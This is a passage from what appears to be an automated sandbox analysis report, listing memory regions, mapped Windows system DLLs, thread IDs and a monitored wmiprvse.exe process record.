0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3052 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3053 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3054 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3055 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3056 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3057 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3058 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3059 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3060 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3061 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3062 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3230 start_va = 0x7fef2280000 end_va = 0x7fef23fffff monitored = 0 entry_point = 0x7fef22b80d0 region_type = mapped_file name = "racengn.dll" filename = "\\Windows\\System32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll") Thread: id = 112 os_tid = 0xee8 Thread: id = 113 os_tid = 0x670 Thread: id = 114 os_tid = 0x47c Thread: id = 115 os_tid = 0x470 Thread: id = 116 os_tid = 0x118 Thread: id = 117 os_tid = 0x38c Thread: id = 118 os_tid = 0x5e4 Thread: id = 119 os_tid = 0x5fc Thread: id = 120 os_tid = 0x5f4 Thread: id = 121 os_tid = 0x5ec Thread: id = 122 os_tid = 0x558 Thread: id = 123 os_tid = 0x554 Thread: id = 124 os_tid = 0x460 Thread: id = 125 os_tid = 0x448 Thread: id = 126 os_tid = 0x3b0 Thread: id = 127 os_tid = 0x3a8 Thread: id = 128 os_tid = 0x398 Thread: id = 129 os_tid = 0x2f8 Thread: id = 130 os_tid = 0x2f4 Thread: id = 131 os_tid = 0x2d0 Thread: id = 132 os_tid = 0x2c4 Thread: id = 135 os_tid = 0xf1c Thread: id = 176 os_tid = 0xfc0 Thread: id = 177 os_tid = 0xfd0 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4d68b000" os_pid = "0xc48" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004bbbc" [0xc000000f] Region: id = 3094 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3095 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3096 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3097 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3098 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3099 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3100 start_va = 0xd0000 end_va = 0xd4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3101 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3102 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3103 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3104 start_va = 0x110000 end_va = 0x11cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 3105 start_va = 0x140000 end_va = 0x142fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 3106 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3107 start_va = 0x1f0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3108 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3109 start_va = 0x3c0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3110 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3111 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 3112 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3113 start_va = 0x800000 end_va = 0xacefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3114 start_va = 0xad0000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3115 start_va = 0xb60000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 3116 start_va = 0xbf0000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3117 start_va = 0xc90000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 3118 start_va = 0xdb0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 3119 start_va = 0xe90000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 3120 start_va = 0xf60000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 3121 start_va = 0xfe0000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3122 start_va = 0x72c90000 end_va = 0x72c92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 3123 start_va = 0x72ca0000 end_va = 0x72ca2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 3124 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3125 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3126 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3127 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3128 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3130 start_va = 0x13f260000 end_va = 0x13f2cbfff monitored = 0 entry_point = 0x13f29b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3131 start_va = 0x7fef0930000 end_va = 0x7fef0b29fff monitored = 0 entry_point = 0x7fef0944c9c region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 3132 start_va = 0x7fef1630000 end_va = 0x7fef1637fff monitored = 0 entry_point = 0x7fef16311a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 3133 start_va = 0x7fef1670000 end_va = 0x7fef1679fff monitored = 0 entry_point = 0x7fef16731c8 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 3134 start_va = 0x7fef1680000 end_va = 0x7fef1691fff monitored = 0 entry_point = 0x7fef168aab8 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3135 start_va = 0x7fef1ef0000 end_va = 0x7fef1f1bfff monitored = 0 entry_point = 0x7fef1f08194 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 3136 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3137 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3138 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3139 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3140 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3141 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3142 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 3143 start_va = 0x7fef96a0000 end_va = 0x7fef96e2fff monitored = 0 entry_point = 0x7fef96c1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3144 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3145 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3146 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3147 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3148 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3149 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3150 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3151 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3152 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3153 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3154 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3155 start_va = 0x7fefcdd0000 end_va = 0x7fefce26fff monitored = 0 entry_point = 0x7fefcdd5e38 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3156 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3157 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3158 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3159 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3160 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3161 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3162 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3163 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3164 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3165 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3166 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3167 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3168 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3169 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3170 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3171 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3172 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3173 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3174 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3175 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3176 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3177 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3178 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3179 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3180 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3181 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3182 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3183 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3184 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3185 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3186 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3187 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3188 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3189 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3190 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3191 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3192 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3193 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3194 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3195 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3196 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3197 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3320 start_va = 0x120000 end_va = 0x124fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3321 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3322 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3323 start_va = 0x1170000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 3324 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3325 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3326 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3327 start_va = 0xd10000 end_va = 0xd63fff monitored = 0 entry_point = 0xd23450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3328 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3329 start_va = 0xd10000 end_va = 